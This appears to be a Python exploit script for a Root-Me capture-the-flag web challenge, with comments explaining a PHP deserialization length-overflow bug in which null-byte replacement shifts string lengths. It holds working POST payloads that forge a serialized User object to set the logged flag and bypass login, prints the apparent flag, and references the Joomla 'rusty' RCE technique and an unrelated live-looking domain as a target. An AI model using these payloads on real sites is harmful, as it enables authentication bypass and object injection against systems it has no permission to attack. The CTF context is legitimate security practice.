deserialize_overflow

1. import requests
2.  
3. headers = {
4.     'Accept-language': 'en-US,en;q=0.9,vi;q=0.8',
5.     'User-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36',
6. }
7.  
8.  
9. url = 'http://challenge01.root-me.org/web-serveur/ch65/'
10. # url = 'http://majorbounty.com/'
11. ## str_replace(search , result_search, input)
12. '''vuln
13. chr(0) . '*' . chr(0) => len == 3
14. '\0\0\0'              => len == 6
15.  
16. str_replace(chr(0) . '*' . chr(0), '\0\0\0', $serialized_value);
17. username=guest;pass=guest
18.  
19. O:4:"User":4:{s:12:"*_username";s:5:"guest";s:12:"*_password";s:5:"guest";s:10:"*_logged";b:0;s:9:"*_email";s:0:"";}
20. O:4:"User":4:{s:12:"\0\0\0_username";s:5:"guest";s:12:"\0\0\0_password";s:5:"guest";s:10:"\0\0\0_logged";b:0;s:9:"\0\0\0_email";s:0:"";}
21.                    wrong with php
22. => need overflow the logged value....
23.  
24. O:4:"User":4:{s:12:"\0\0\0_username";s:54:"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";s:12:"\0\0\0_password";s:XX:"";s:10:"\0\0\0_logged";b:0;s:9:"\0\0\0_email";s:0:"";}
25. O:4:"User":4:{s:12:"\0\0\0_username";s:54:" *  *  *  *  *  *  *  *  * ";s:12:" * _password";s:XX:"";s:10:"\0\0\0_logged";b:0;s:9:"\0\0\0_email";s:0:"";}
26.                                          |                                                      |
27. O:4:"User":4:{s:12:"\0\0\0_username";s:54:"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";s:12:"\0\0\0_password";s:55:";s:12:"\0\0\0_password";s:0:"";s:10:"\0\0\0_logged";b:1;s:9:"\0\0\0_email";s:0:"";}
28. '''
29.  
30. '''
31. (in database)
32. s:8:s:"username";s:54:"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";s:8:"password";s:10:"MYPASSWORD"
33.  
34. (after read and replace)
35. s:8:s:"username";s:54:"NNNNNNNNNNNNNNNNNNNNNNNNNNN";s:8:"password";s:10:"MYPASSWORD"
36.  
37. (Achieve Object injection):
38. s:8:s:"username";s:54:"NNNNNNNNNNNNNNNNNNNNNNNNNNN";s:8:"password";s:10:"MYPA";s:2:"HS":O:15:"ObjectInjection"
39. '''
40.  
41. class Hacker:
42.     def __init__(self):
43.         self.url = url
44.         self.requests_session = requests.session()
45.         self.headers=headers
46.         self.proxies = None
47.         # self.proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"}
48.    
49.     def login(self):# \\0\\0
50.         ## http://majorbounty.com/
51.         ## joomla rusty rce
52.         ## https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41
53.         ## https://github.com/kiks7/rusty_joomla_rce
54.         ## +'";s:10:"\\0\\0\\0_logged";b:1;s:9:" * _email";s:0:"";}//'
55.         # data = {'username':'\\0'*27,'password':';s:12:"\\0\\0\\0_password";s:0:"";s:10:"\\0\\0\\0_logged";b:1;s:9:"\\0\\0\\0_email";s:0:"";}//','submit':'login'}
56.         data = {'username':'\\0'*27,'password':';s:12:"\\0\\0\\0_password";s:0:"";s:10:"\\0\\0\\0_logged";b:1;s:9:"\\0\\0\\0_email";s:0:"";}','submit':'login'}
57.         # data = {'username':'\\0'*27,'password':';s:12:"\\0\\0\\0_password";s:1:"a";s:10:"\\0\\0\\0_logged";b:1;s:9:"\\0\\0\\0_email";s:44:','submit':'login'}
58.         resp = self.requests_session.request("POST",url,data=data,headers=headers,proxies=self.proxies,verify=False)
59.         Cookie = ';'.join([f'{value.name}={value.value}' for value in resp.cookies])#+';user='
60.         # self.headers['cookie']= Cookie
61.    
62.     def get_cookie(self):
63.         resp = self.requests_session.request("GET",url,headers=self.headers,proxies=self.proxies,verify=False)
64.         # if b'you are logged in! congratz, the flag is: ' in resp.content:print(resp.content);input()
65.         print(resp.content)#;input()
66.  
67. ## B3Carrefull-w1th_Unseri4l1ze
68. if __name__=='__main__':
69.     hacker = Hacker()
70.     hacker.login()
71.     hacker.get_cookie()
72.    
73.